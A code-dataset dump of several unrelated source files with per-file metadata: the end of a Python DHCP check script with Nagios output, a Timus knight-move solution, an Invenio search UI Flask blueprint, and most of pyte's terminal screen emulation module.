chaddr = hwmac(res.GetOption('chaddr')[:6])
yiaddr = ipv4(res.GetOption('yiaddr'))
if opts.nagios and dhcp_message_type not in (2, 5):
nagiosExit(2,"Got %s response for our %s request"%(dhcpTypes.get(dhcp_message_type,'UNKNOWN'),dhcpTypes.get(request_dhcp_message_type,'UNKNOWN')))
if verbose != False:
print "Received %s packet from %s; [%s] was bound to %s"%(dhcpTypes.get(dhcp_message_type,'UNKNOWN'), server_identifier, chaddr, yiaddr )
if verbose == True:
print "-"*100
res.PrintHeaders()
res.PrintOptions()
print "="*100
print "\n"
if opts.docycle:
if dhcp_message_type == 2:
request_dhcp_message_type = 'request'
request_ciaddr = yiaddr.str()
serverip = server_identifier.str()
continue
if dhcp_message_type == 5:
request_dhcp_message_type = 'release'
request_ciaddr = yiaddr.str()
serverip = server_identifier.str()
continue
cycleno += 1
if cycleno > opts.cycles:
if opts.nagios:
if res:
nagiosExit(0,"%s finished successfully: %s. yiaddr: %s, chaddr: %s"%(
request_dhcp_message_type.upper(),
dhcpTypes.get(dhcp_message_type,'UNKNOWN'),
yiaddr,
chaddr,
))
elif opts.docycle:
nagiosExit(0,"Cycle has been finished successfully. Got %s for %s"%(yiaddr,chaddr))
else:
nagiosExit(0,"%s has been finished without the answer"%(request_dhcp_message_type.upper()))
break
if opts.docycle:
request_dhcp_message_type = "discover"
request_ciaddr = opts.ciaddr
serverip = opts.server
xid = genxid()
if not opts.chaddr:
chaddr = genmac()
else:
chaddr = opts.chaddr
if __name__ == '__main__':
main()
| gpl-2.0 | -6,692,521,198,314,802,000 | 29.712446 | 157 | 0.670486 | false | 2.9054 | false | false | false |
AHJenin/acm-type-problems | Timus/AC/1197-Lonesome_Knight.py | 1 | 1209 | #!/usr/bin/env python3
#
# FILE: 1197-Lonesome_Knight.py
#
# @author: Arafat Hasan Jenin <opendoor.arafat[at]gmail[dot]com>
#
# LINK:
#
# DATE CREATED: 15-06-18 15:40:41 (+06)
# LAST MODIFIED: 15-06-18 17:29:41 (+06)
#
# VERDICT: Accepted
#
# DEVELOPMENT HISTORY:
# Date Version Description
# --------------------------------------------------------------------
# 15-06-18 1.0 Deleted code is debugged code.
#
# _/ _/_/_/_/ _/ _/ _/_/_/ _/ _/
# _/ _/ _/_/ _/ _/ _/_/ _/
# _/ _/_/_/ _/ _/ _/ _/ _/ _/ _/
# _/ _/ _/ _/ _/_/ _/ _/ _/_/
# _/_/ _/_/_/_/ _/ _/ _/_/_/ _/ _/
#
##############################################################################
dx = [2, 1, -1, -2, -2, -1, 1, 2]
dy = [1, 2, 2, 1, -1, -2, -2, -1] # Knight Direction
N = int(input())
while (N > 0):
N -= 1
pos = input()
x = ord(pos[0]) - ord('a')
y = int(pos[1]) - 1
ans = 0
for i in range(0, 8):
new_x = x + dx[i]
new_y = y + dy[i]
if new_x >= 0 and new_x < 8 and new_y >= 0 and new_y < 8:
ans += 1
print(ans)
| mit | 8,361,550,323,378,487,000 | 27.116279 | 78 | 0.322581 | false | 2.503106 | false | false | false |
nikofil/invenio-search-ui | invenio_search_ui/views.py | 1 | 2169 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015, 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""UI for Invenio-Search."""
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, json, render_template
blueprint = Blueprint(
'invenio_search_ui',
__name__,
template_folder='templates',
static_folder='static',
)
@blueprint.route("/search")
def search():
"""Search page ui."""
return render_template(current_app.config['SEARCH_UI_SEARCH_TEMPLATE'])
def sorted_options(sort_options):
"""Sort sort options for display.
:param sort_options: A dictionary containing the field name as key and
asc/desc as value.
:returns: A dictionary with sorting options for Invenio-Search-JS.
"""
return [
{
'title': v['title'],
'value': ('-{0}'.format(k)
if v.get('default_order', 'asc') == 'desc' else k),
}
for k, v in
sorted(sort_options.items(), key=lambda x: x[1].get('order', 0))
]
@blueprint.app_template_filter('format_sortoptions')
def format_sortoptions(sort_options):
"""Create sort options JSON dump for Invenio-Search-JS."""
return json.dumps({
'options': sorted_options(sort_options)
})
| gpl-2.0 | 7,984,396,494,800,520,000 | 30.897059 | 76 | 0.68142 | false | 3.894075 | false | false | false |
dmilith/SublimeText3-dmilith | Packages/pyte/all/pyte/screens.py | 1 | 46773 | # -*- coding: utf-8 -*-
"""
pyte.screens
~~~~~~~~~~~~
This module provides classes for terminal screens, currently
it contains three screens with different features:
* :class:`~pyte.screens.Screen` -- base screen implementation,
which handles all the core escape sequences, recognized by
:class:`~pyte.streams.Stream`.
* If you need a screen to keep track of the changed lines
(which you probably do need) -- use
:class:`~pyte.screens.DiffScreen`.
* If you also want a screen to collect history and allow
pagination -- :class:`pyte.screen.HistoryScreen` is here
for ya ;)
.. note:: It would be nice to split those features into mixin
classes, rather than subclasses, but it's not obvious
how to do -- feel free to submit a pull request.
:copyright: (c) 2011-2012 by Selectel.
:copyright: (c) 2012-2017 by pyte authors and contributors,
see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
from __future__ import absolute_import, unicode_literals, division
import copy
import json
import math
import os
import sys
import unicodedata
import warnings
from collections import deque, namedtuple, defaultdict
from wcwidth import wcwidth
# There is no standard 2.X backport for ``lru_cache``.
if sys.version_info >= (3, 2):
from functools import lru_cache
wcwidth = lru_cache(maxsize=4096)(wcwidth)
from . import (
charsets as cs,
control as ctrl,
graphics as g,
modes as mo
)
from .compat import map, range, str
from .streams import Stream
#: A container for screen's scroll margins.
Margins = namedtuple("Margins", "top bottom")
#: A container for savepoint, created on :data:`~pyte.escape.DECSC`.
Savepoint = namedtuple("Savepoint", [
"cursor",
"g0_charset",
"g1_charset",
"charset",
"origin",
"wrap"
])
class Char(namedtuple("Char", [
"data",
"fg",
"bg",
"bold",
"italics",
"underscore",
"strikethrough",
"reverse",
])):
"""A single styled on-screen character.
:param str data: unicode character. Invariant: ``len(data) == 1``.
:param str fg: foreground colour. Defaults to ``"default"``.
:param str bg: background colour. Defaults to ``"default"``.
:param bool bold: flag for rendering the character using bold font.
Defaults to ``False``.
:param bool italics: flag for rendering the character using italic font.
Defaults to ``False``.
:param bool underscore: flag for rendering the character underlined.
Defaults to ``False``.
:param bool strikethrough: flag for rendering the character with a
strike-through line. Defaults to ``False``.
:param bool reverse: flag for swapping foreground and background colours
during rendering. Defaults to ``False``.
"""
__slots__ = ()
def __new__(cls, data, fg="default", bg="default", bold=False,
italics=False, underscore=False,
strikethrough=False, reverse=False):
return super(Char, cls).__new__(cls, data, fg, bg, bold, italics,
underscore, strikethrough, reverse)
class Cursor(object):
"""Screen cursor.
:param int x: 0-based horizontal cursor position.
:param int y: 0-based vertical cursor position.
:param pyte.screens.Char attrs: cursor attributes (see
:meth:`~pyte.screens.Screen.select_graphic_rendition`
for details).
"""
__slots__ = ("x", "y", "attrs", "hidden")
def __init__(self, x, y, attrs=Char(" ")):
self.x = x
self.y = y
self.attrs = attrs
self.hidden = False
class StaticDefaultDict(dict):
"""A :func:`dict` with a static default value.
Unlike :func:`collections.defaultdict` this implementation does not
implicitly update the mapping when queried with a missing key.
>>> d = StaticDefaultDict(42)
>>> d["foo"]
42
>>> d
{}
"""
def __init__(self, default):
self.default = default
def __missing__(self, key):
return self.default
class Screen(object):
"""
A screen is an in-memory matrix of characters that represents the
screen display of the terminal. It can be instantiated on its own
and given explicit commands, or it can be attached to a stream and
will respond to events.
.. attribute:: buffer
A sparse ``lines x columns`` :class:`~pyte.screens.Char` matrix.
.. attribute:: dirty
A set of line numbers, which should be re-drawn. The user is responsible
for clearing this set when changes have been applied.
>>> screen = Screen(80, 24)
>>> screen.dirty.clear()
>>> screen.draw("!")
>>> list(screen.dirty)
[0]
.. versionadded:: 0.7.0
.. attribute:: cursor
Reference to the :class:`~pyte.screens.Cursor` object, holding
cursor position and attributes.
.. attribute:: margins
Margins determine which screen lines move during scrolling
(see :meth:`index` and :meth:`reverse_index`). Characters added
outside the scrolling region do not make the screen to scroll.
The value is ``None`` if margins are set to screen boundaries,
otherwise -- a pair 0-based top and bottom line indices.
.. attribute:: charset
Current charset number; can be either ``0`` or ``1`` for `G0`
and `G1` respectively, note that `G0` is activated by default.
.. note::
According to ``ECMA-48`` standard, **lines and columns are
1-indexed**, so, for instance ``ESC [ 10;10 f`` really means
-- move cursor to position (9, 9) in the display matrix.
.. versionchanged:: 0.4.7
.. warning::
:data:`~pyte.modes.LNM` is reset by default, to match VT220
specification. Unfortunatelly this makes :mod:`pyte` fail
``vttest`` for cursor movement.
.. versionchanged:: 0.4.8
.. warning::
If `DECAWM` mode is set than a cursor will be wrapped to the
**beginning** of the next line, which is the behaviour described
in ``man console_codes``.
.. seealso::
`Standard ECMA-48, Section 6.1.1 \
<http://ecma-international.org/publications/standards/Ecma-048.htm>`_
for a description of the presentational component, implemented
by ``Screen``.
"""
@property
def default_char(self):
"""An empty character with default foreground and background colors."""
reverse = mo.DECSCNM in self.mode
return Char(data=" ", fg="default", bg="default", reverse=reverse)
def __init__(self, columns, lines):
self.savepoints = []
self.columns = columns
self.lines = lines
self.buffer = defaultdict(lambda: StaticDefaultDict(self.default_char))
self.dirty = set()
self.reset()
def __repr__(self):
return ("{0}({1}, {2})".format(self.__class__.__name__,
self.columns, self.lines))
@property
def display(self):
"""A :func:`list` of screen lines as unicode strings."""
def render(line):
is_wide_char = False
for x in range(self.columns):
if is_wide_char: # Skip stub
is_wide_char = False
continue
char = line[x].data
assert sum(map(wcwidth, char[1:])) == 0
is_wide_char = wcwidth(char[0]) == 2
yield char
return ["".join(render(self.buffer[y])) for y in range(self.lines)]
def reset(self):
"""Reset the terminal to its initial state.
* Scrolling margins are reset to screen boundaries.
* Cursor is moved to home location -- ``(0, 0)`` and its
attributes are set to defaults (see :attr:`default_char`).
* Screen is cleared -- each character is reset to
:attr:`default_char`.
* Tabstops are reset to "every eight columns".
* All lines are marked as :attr:`dirty`.
.. note::
Neither VT220 nor VT102 manuals mention that terminal modes
and tabstops should be reset as well, thanks to
:manpage:`xterm` -- we now know that.
"""
self.dirty.update(range(self.lines))
self.buffer.clear()
self.margins = None
self.mode = set([mo.DECAWM, mo.DECTCEM])
self.title = ""
self.icon_name = ""
self.charset = 0
self.g0_charset = cs.LAT1_MAP
self.g1_charset = cs.VT100_MAP
# From ``man terminfo`` -- "... hardware tabs are initially
# set every `n` spaces when the terminal is powered up. Since
# we aim to support VT102 / VT220 and linux -- we use n = 8.
self.tabstops = set(range(8, self.columns, 8))
self.cursor = Cursor(0, 0)
self.cursor_position()
self.saved_columns = None
def resize(self, lines=None, columns=None):
"""Resize the screen to the given size.
If the requested screen size has more lines than the existing
screen, lines will be added at the bottom. If the requested
size has less lines than the existing screen lines will be
clipped at the top of the screen. Similarly, if the existing
screen has less columns than the requested screen, columns will
be added at the right, and if it has more -- columns will be
clipped at the right.
:param int lines: number of lines in the new screen.
:param int columns: number of columns in the new screen.
.. versionchanged:: 0.7.0
If the requested screen size is identical to the current screen
size, the method does nothing.
"""
lines = lines or self.lines
columns = columns or self.columns
if lines == self.lines and columns == self.columns:
return # No changes.
self.dirty.update(range(lines))
if lines < self.lines:
self.save_cursor()
self.cursor_position(0, 0)
self.delete_lines(self.lines - lines) # Drop from the top.
self.restore_cursor()
if columns < self.columns:
for line in self.buffer.values():
for x in range(columns, self.columns):
line.pop(x, None)
self.lines, self.columns = lines, columns
self.set_margins()
def set_margins(self, top=None, bottom=None):
"""Select top and bottom margins for the scrolling region.
:param int top: the smallest line number that is scrolled.
:param int bottom: the biggest line number that is scrolled.
"""
if top is None and bottom is None:
self.margins = None
return
margins = self.margins or Margins(0, self.lines - 1)
# Arguments are 1-based, while :attr:`margins` are zero
# based -- so we have to decrement them by one. We also
# make sure that both of them is bounded by [0, lines - 1].
if top is None:
top = margins.top
else:
top = max(0, min(top - 1, self.lines - 1))
if bottom is None:
bottom = margins.bottom
else:
bottom = max(0, min(bottom - 1, self.lines - 1))
# Even though VT102 and VT220 require DECSTBM to ignore
# regions of width less than 2, some programs (like aptitude
# for example) rely on it. Practicality beats purity.
if bottom - top >= 1:
self.margins = Margins(top, bottom)
# The cursor moves to the home position when the top and
# bottom margins of the scrolling region (DECSTBM) changes.
self.cursor_position()
def set_mode(self, *modes, **kwargs):
"""Set (enable) a given list of modes.
:param list modes: modes to set, where each mode is a constant
from :mod:`pyte.modes`.
"""
# Private mode codes are shifted, to be distingiushed from non
# private ones.
if kwargs.get("private"):
modes = [mode << 5 for mode in modes]
if mo.DECSCNM in modes:
self.dirty.update(range(self.lines))
self.mode.update(modes)
# When DECOLM mode is set, the screen is erased and the cursor
# moves to the home position.
if mo.DECCOLM in modes:
self.saved_columns = self.columns
self.resize(columns=132)
self.erase_in_display(2)
self.cursor_position()
# According to VT520 manual, DECOM should also home the cursor.
if mo.DECOM in modes:
self.cursor_position()
# Mark all displayed characters as reverse.
if mo.DECSCNM in modes:
for line in self.buffer.values():
line.default = self.default_char
for x in line:
line[x] = line[x]._replace(reverse=True)
self.select_graphic_rendition(7) # +reverse.
# Make the cursor visible.
if mo.DECTCEM in modes:
self.cursor.hidden = False
def reset_mode(self, *modes, **kwargs):
"""Reset (disable) a given list of modes.
:param list modes: modes to reset -- hopefully, each mode is a
constant from :mod:`pyte.modes`.
"""
# Private mode codes are shifted, to be distinguished from non
# private ones.
if kwargs.get("private"):
modes = [mode << 5 for mode in modes]
if mo.DECSCNM in modes:
self.dirty.update(range(self.lines))
self.mode.difference_update(modes)
# Lines below follow the logic in :meth:`set_mode`.
if mo.DECCOLM in modes:
if self.columns == 132 and self.saved_columns is not None:
self.resize(columns=self.saved_columns)
self.saved_columns = None
self.erase_in_display(2)
self.cursor_position()
if mo.DECOM in modes:
self.cursor_position()
if mo.DECSCNM in modes:
for line in self.buffer.values():
line.default = self.default_char
for x in line:
line[x] = line[x]._replace(reverse=False)
self.select_graphic_rendition(27) # -reverse.
# Hide the cursor.
if mo.DECTCEM in modes:
self.cursor.hidden = True
def define_charset(self, code, mode):
"""Define ``G0`` or ``G1`` charset.
:param str code: character set code, should be a character
from ``"B0UK"``, otherwise ignored.
:param str mode: if ``"("`` ``G0`` charset is defined, if
``")"`` -- we operate on ``G1``.
.. warning:: User-defined charsets are currently not supported.
"""
if code in cs.MAPS:
if mode == "(":
self.g0_charset = cs.MAPS[code]
elif mode == ")":
self.g1_charset = cs.MAPS[code]
def shift_in(self):
"""Select ``G0`` character set."""
self.charset = 0
def shift_out(self):
"""Select ``G1`` character set."""
self.charset = 1
def draw(self, data):
"""Display decoded characters at the current cursor position and
advances the cursor if :data:`~pyte.modes.DECAWM` is set.
:param str data: text to display.
.. versionchanged:: 0.5.0
Character width is taken into account. Specifically, zero-width
and unprintable characters do not affect screen state. Full-width
characters are rendered into two consecutive character containers.
"""
data = data.translate(
self.g1_charset if self.charset else self.g0_charset)
for char in data:
char_width = wcwidth(char)
# If this was the last column in a line and auto wrap mode is
# enabled, move the cursor to the beginning of the next line,
# otherwise replace characters already displayed with newly
# entered.
if self.cursor.x == self.columns:
if mo.DECAWM in self.mode:
self.dirty.add(self.cursor.y)
self.carriage_return()
self.linefeed()
elif char_width > 0:
self.cursor.x -= char_width
# If Insert mode is set, new characters move old characters to
# the right, otherwise terminal is in Replace mode and new
# characters replace old characters at cursor position.
if mo.IRM in self.mode and char_width > 0:
self.insert_characters(char_width)
line = self.buffer[self.cursor.y]
if char_width == 1:
line[self.cursor.x] = self.cursor.attrs._replace(data=char)
elif char_width == 2:
# A two-cell character has a stub slot after it.
line[self.cursor.x] = self.cursor.attrs._replace(data=char)
if self.cursor.x + 1 < self.columns:
line[self.cursor.x + 1] = self.cursor.attrs \
._replace(data="")
elif char_width == 0 and unicodedata.combining(char):
# A zero-cell character is combined with the previous
# character either on this or preceeding line.
if self.cursor.x:
last = line[self.cursor.x - 1]
normalized = unicodedata.normalize("NFC", last.data + char)
line[self.cursor.x - 1] = last._replace(data=normalized)
elif self.cursor.y:
last = self.buffer[self.cursor.y - 1][self.columns - 1]
normalized = unicodedata.normalize("NFC", last.data + char)
self.buffer[self.cursor.y - 1][self.columns - 1] = \
last._replace(data=normalized)
else:
break # Unprintable character or doesn't advance the cursor.
# .. note:: We can't use :meth:`cursor_forward()`, because that
# way, we'll never know when to linefeed.
if char_width > 0:
self.cursor.x = min(self.cursor.x + char_width, self.columns)
self.dirty.add(self.cursor.y)
def set_title(self, param):
"""Set terminal title.
.. note:: This is an XTerm extension supported by the Linux terminal.
"""
self.title = param
def set_icon_name(self, param):
"""Set icon name.
.. note:: This is an XTerm extension supported by the Linux terminal.
"""
self.icon_name = param
def carriage_return(self):
"""Move the cursor to the beginning of the current line."""
self.cursor.x = 0
def index(self):
"""Move the cursor down one line in the same column. If the
cursor is at the last line, create a new line at the bottom.
"""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == bottom:
# TODO: mark only the lines within margins?
self.dirty.update(range(self.lines))
for y in range(top, bottom):
self.buffer[y] = self.buffer[y + 1]
self.buffer.pop(bottom, None)
else:
self.cursor_down()
def reverse_index(self):
"""Move the cursor up one line in the same column. If the cursor
is at the first line, create a new line at the top.
"""
top, bottom = self.margins or Margins(0, self.lines - 1)
if self.cursor.y == top:
# TODO: mark only the lines within margins?
self.dirty.update(range(self.lines))
for y in range(bottom, top, -1):
self.buffer[y] = self.buffer[y - 1]
self.buffer.pop(top, None)
else:
self.cursor_up()
def linefeed(self):
"""Perform an index and, if :data:`~pyte.modes.LNM` is set, a
carriage return.
"""
self.index()
if mo.LNM in self.mode:
self.carriage_return()
def tab(self):
"""Move to the next tab space, or the end of the screen if there
aren't anymore left.
"""
for stop in sorted(self.tabstops):
if self.cursor.x < stop:
column = stop
break
else:
column = self.columns - 1
self.cursor.x = column
def backspace(self):
"""Move cursor to the left one or keep it in its position if
it's at the beginning of the line already.
"""
self.cursor_back()
def save_cursor(self):
"""Push the current cursor position onto the stack."""
self.savepoints.append(Savepoint(copy.copy(self.cursor),
self.g0_charset,
self.g1_charset,
self.charset,
mo.DECOM in self.mode,
mo.DECAWM in self.mode))
def restore_cursor(self):
"""Set the current cursor position to whatever cursor is on top
of the stack.
"""
if self.savepoints:
savepoint = self.savepoints.pop()
self.g0_charset = savepoint.g0_charset
self.g1_charset = savepoint.g1_charset
self.charset = savepoint.charset
if savepoint.origin:
self.set_mode(mo.DECOM)
if savepoint.wrap:
self.set_mode(mo.DECAWM)
self.cursor = savepoint.cursor
self.ensure_hbounds()
self.ensure_vbounds(use_margins=True)
else:
# If nothing was saved, the cursor moves to home position;
# origin mode is reset. :todo: DECAWM?
self.reset_mode(mo.DECOM)
self.cursor_position()
def insert_lines(self, count=None):
"""Insert the indicated # of lines at line with cursor. Lines
displayed **at** and below the cursor move down. Lines moved
past the bottom margin are lost.
:param count: number of lines to insert.
"""
count = count or 1
top, bottom = self.margins or Margins(0, self.lines - 1)
# If cursor is outside scrolling margins it -- do nothin'.
if top <= self.cursor.y <= bottom:
self.dirty.update(range(self.cursor.y, self.lines))
for y in range(bottom, self.cursor.y - 1, -1):
if y + count <= bottom and y in self.buffer:
self.buffer[y + count] = self.buffer[y]
self.buffer.pop(y, None)
self.carriage_return()
def delete_lines(self, count=None):
"""Delete the indicated # of lines, starting at line with
cursor. As lines are deleted, lines displayed below cursor
move up. Lines added to bottom of screen have spaces with same
character attributes as last line moved up.
:param int count: number of lines to delete.
"""
count = count or 1
top, bottom = self.margins or Margins(0, self.lines - 1)
# If cursor is outside scrolling margins -- do nothin'.
if top <= self.cursor.y <= bottom:
self.dirty.update(range(self.cursor.y, self.lines))
for y in range(self.cursor.y, bottom + 1):
if y + count <= bottom:
if y + count in self.buffer:
self.buffer[y] = self.buffer.pop(y + count)
else:
self.buffer.pop(y, None)
self.carriage_return()
def insert_characters(self, count=None):
"""Insert the indicated # of blank characters at the cursor
position. The cursor does not move and remains at the beginning
of the inserted blank characters. Data on the line is shifted
forward.
:param int count: number of characters to insert.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.columns, self.cursor.x - 1, -1):
if x + count <= self.columns:
line[x + count] = line[x]
line.pop(x, None)
def delete_characters(self, count=None):
"""Delete the indicated # of characters, starting with the
character at cursor position. When a character is deleted, all
characters to the right of cursor move left. Character attributes
move with the characters.
:param int count: number of characters to delete.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.cursor.x, self.columns):
if x + count <= self.columns:
line[x] = line.pop(x + count, self.default_char)
else:
line.pop(x, None)
def erase_characters(self, count=None):
"""Erase the indicated # of characters, starting with the
character at cursor position. Character attributes are set
cursor attributes. The cursor remains in the same position.
:param int count: number of characters to erase.
.. note::
Using cursor attributes for character attributes may seem
illogical, but if recall that a terminal emulator emulates
a type writer, it starts to make sense. The only way a type
writer could erase a character is by typing over it.
"""
self.dirty.add(self.cursor.y)
count = count or 1
line = self.buffer[self.cursor.y]
for x in range(self.cursor.x,
min(self.cursor.x + count, self.columns)):
line[x] = self.cursor.attrs
def erase_in_line(self, how=0, private=False):
"""Erase a line in a specific way.
Character attributes are set to cursor attributes.
:param int how: defines the way the line should be erased in:
* ``0`` -- Erases from cursor to end of line, including cursor
position.
* ``1`` -- Erases from beginning of line to cursor,
including cursor position.
* ``2`` -- Erases complete line.
:param bool private: when ``True`` only characters marked as
eraseable are affected **not implemented**.
"""
self.dirty.add(self.cursor.y)
if how == 0:
interval = range(self.cursor.x, self.columns)
elif how == 1:
interval = range(self.cursor.x + 1)
elif how == 2:
interval = range(self.columns)
line = self.buffer[self.cursor.y]
for x in interval:
line[x] = self.cursor.attrs
def erase_in_display(self, how=0, private=False):
"""Erases display in a specific way.
Character attributes are set to cursor attributes.
:param int how: defines the way the line should be erased in:
* ``0`` -- Erases from cursor to end of screen, including
cursor position.
* ``1`` -- Erases from beginning of screen to cursor,
including cursor position.
* ``2`` and ``3`` -- Erases complete display. All lines
are erased and changed to single-width. Cursor does not
move.
:param bool private: when ``True`` only characters marked as
eraseable are affected **not implemented**.
"""
if how == 0:
interval = range(self.cursor.y + 1, self.lines)
elif how == 1:
interval = range(self.cursor.y)
elif how == 2 or how == 3:
interval = range(self.lines)
self.dirty.update(interval)
for y in interval:
line = self.buffer[y]
for x in line:
line[x] = self.cursor.attrs
if how == 0 or how == 1:
self.erase_in_line(how)
def set_tab_stop(self):
"""Set a horizontal tab stop at cursor position."""
self.tabstops.add(self.cursor.x)
def clear_tab_stop(self, how=0):
"""Clear a horizontal tab stop.
:param int how: defines a way the tab stop should be cleared:
* ``0`` or nothing -- Clears a horizontal tab stop at cursor
position.
* ``3`` -- Clears all horizontal tab stops.
"""
if how == 0:
# Clears a horizontal tab stop at cursor position, if it's
# present, or silently fails if otherwise.
self.tabstops.discard(self.cursor.x)
elif how == 3:
self.tabstops = set() # Clears all horizontal tab stops.
def ensure_hbounds(self):
"""Ensure the cursor is within horizontal screen bounds."""
self.cursor.x = min(max(0, self.cursor.x), self.columns - 1)
def ensure_vbounds(self, use_margins=None):
"""Ensure the cursor is within vertical screen bounds.
:param bool use_margins: when ``True`` or when
:data:`~pyte.modes.DECOM` is set,
cursor is bounded by top and and bottom
margins, instead of ``[0; lines - 1]``.
"""
if (use_margins or mo.DECOM in self.mode) and self.margins is not None:
top, bottom = self.margins
else:
top, bottom = 0, self.lines - 1
self.cursor.y = min(max(top, self.cursor.y), bottom)
def cursor_up(self, count=None):
"""Move cursor up the indicated # of lines in same column.
Cursor stops at top margin.
:param int count: number of lines to skip.
"""
top, _bottom = self.margins or Margins(0, self.lines - 1)
self.cursor.y = max(self.cursor.y - (count or 1), top)
def cursor_up1(self, count=None):
"""Move cursor up the indicated # of lines to column 1. Cursor
stops at bottom margin.
:param int count: number of lines to skip.
"""
self.cursor_up(count)
self.carriage_return()
def cursor_down(self, count=None):
"""Move cursor down the indicated # of lines in same column.
Cursor stops at bottom margin.
:param int count: number of lines to skip.
"""
_top, bottom = self.margins or Margins(0, self.lines - 1)
self.cursor.y = min(self.cursor.y + (count or 1), bottom)
def cursor_down1(self, count=None):
"""Move cursor down the indicated # of lines to column 1.
Cursor stops at bottom margin.
:param int count: number of lines to skip.
"""
self.cursor_down(count)
self.carriage_return()
def cursor_back(self, count=None):
"""Move cursor left the indicated # of columns. Cursor stops
at left margin.
:param int count: number of columns to skip.
"""
# Handle the case when we've just drawn in the last column
# and would wrap the line on the next :meth:`draw()` call.
if self.cursor.x == self.columns:
self.cursor.x -= 1
self.cursor.x -= count or 1
self.ensure_hbounds()
def cursor_forward(self, count=None):
"""Move cursor right the indicated # of columns. Cursor stops
at right margin.
:param int count: number of columns to skip.
"""
self.cursor.x += count or 1
self.ensure_hbounds()
def cursor_position(self, line=None, column=None):
"""Set the cursor to a specific `line` and `column`.
Cursor is allowed to move out of the scrolling region only when
:data:`~pyte.modes.DECOM` is reset, otherwise -- the position
doesn't change.
:param int line: line number to move the cursor to.
:param int column: column number to move the cursor to.
"""
column = (column or 1) - 1
line = (line or 1) - 1
# If origin mode (DECOM) is set, line number are relative to
# the top scrolling margin.
if self.margins is not None and mo.DECOM in self.mode:
line += self.margins.top
# Cursor is not allowed to move out of the scrolling region.
if not self.margins.top <= line <= self.margins.bottom:
return
self.cursor.x = column
self.cursor.y = line
self.ensure_hbounds()
self.ensure_vbounds()
def cursor_to_column(self, column=None):
"""Move cursor to a specific column in the current line.
:param int column: column number to move the cursor to.
"""
self.cursor.x = (column or 1) - 1
self.ensure_hbounds()
def cursor_to_line(self, line=None):
"""Move cursor to a specific line in the current column.
:param int line: line number to move the cursor to.
"""
self.cursor.y = (line or 1) - 1
# If origin mode (DECOM) is set, line number are relative to
# the top scrolling margin.
if mo.DECOM in self.mode:
self.cursor.y += self.margins.top
# FIXME: should we also restrict the cursor to the scrolling
# region?
self.ensure_vbounds()
def bell(self, *args):
"""Bell stub -- the actual implementation should probably be
provided by the end-user.
"""
def alignment_display(self):
"""Fills screen with uppercase E's for screen focus and alignment."""
self.dirty.update(range(self.lines))
for y in range(self.lines):
for x in range(self.columns):
self.buffer[y][x] = self.buffer[y][x]._replace(data="E")
def select_graphic_rendition(self, *attrs):
"""Set display attributes.
:param list attrs: a list of display attributes to set.
"""
replace = {}
# Fast path for resetting all attributes.
if not attrs or attrs == (0, ):
self.cursor.attrs = self.default_char
return
else:
attrs = list(reversed(attrs))
while attrs:
attr = attrs.pop()
if attr == 0:
# Reset all attributes.
replace.update(self.default_char._asdict())
elif attr in g.FG_ANSI:
replace["fg"] = g.FG_ANSI[attr]
elif attr in g.BG:
replace["bg"] = g.BG_ANSI[attr]
elif attr in g.TEXT:
attr = g.TEXT[attr]
replace[attr[1:]] = attr.startswith("+")
elif attr in g.FG_AIXTERM:
replace.update(fg=g.FG_AIXTERM[attr], bold=True)
elif attr in g.BG_AIXTERM:
replace.update(bg=g.BG_AIXTERM[attr], bold=True)
elif attr in (g.FG_256, g.BG_256):
key = "fg" if attr == g.FG_256 else "bg"
try:
n = attrs.pop()
if n == 5: # 256.
m = attrs.pop()
replace[key] = g.FG_BG_256[m]
elif n == 2: # 24bit.
# This is somewhat non-standard but is nonetheless
# supported in quite a few terminals. See discussion
# here https://gist.github.com/XVilka/8346728.
replace[key] = "{0:02x}{1:02x}{2:02x}".format(
attrs.pop(), attrs.pop(), attrs.pop())
except IndexError:
pass
self.cursor.attrs = self.cursor.attrs._replace(**replace)
def report_device_attributes(self, mode=0, **kwargs):
"""Report terminal identity.
.. versionadded:: 0.5.0
.. versionchanged:: 0.7.0
If ``private`` keyword argument is set, the method does nothing.
This behaviour is consistent with VT220 manual.
"""
# We only implement "primary" DA which is the only DA request
# VT102 understood, see ``VT102ID`` in ``linux/drivers/tty/vt.c``.
if mode == 0 and not kwargs.get("private"):
self.write_process_input(ctrl.CSI + "?6c")
def report_device_status(self, mode):
"""Report terminal status or cursor position.
:param int mode: if 5 -- terminal status, 6 -- cursor position,
otherwise a noop.
.. versionadded:: 0.5.0
"""
if mode == 5: # Request for terminal status.
self.write_process_input(ctrl.CSI + "0n")
elif mode == 6: # Request for cursor position.
x = self.cursor.x + 1
y = self.cursor.y + 1
# "Origin mode (DECOM) selects line numbering."
if mo.DECOM in self.mode:
y -= self.margins.top
self.write_process_input(ctrl.CSI + "{0};{1}R".format(y, x))
def write_process_input(self, data):
"""Write data to the process running inside the terminal.
By default is a noop.
:param str data: text to write to the process ``stdin``.
.. versionadded:: 0.5.0
"""
def debug(self, *args, **kwargs):
"""Endpoint for unrecognized escape sequences.
By default is a noop.
"""
class DiffScreen(Screen):
"""
A screen subclass, which maintains a set of dirty lines in its
:attr:`dirty` attribute. The end user is responsible for emptying
a set, when a diff is applied.
.. deprecated:: 0.7.0
The functionality contained in this class has been merged into
:class:`~pyte.screens.Screen` and will be removed in 0.8.0.
Please update your code accordingly.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"The functionality of ``DiffScreen` has been merged into "
"``Screen`` and will be removed in 0.8.0. Please update "
"your code accordingly.", DeprecationWarning)
super(DiffScreen, self).__init__(*args, **kwargs)
History = namedtuple("History", "top bottom ratio size position")
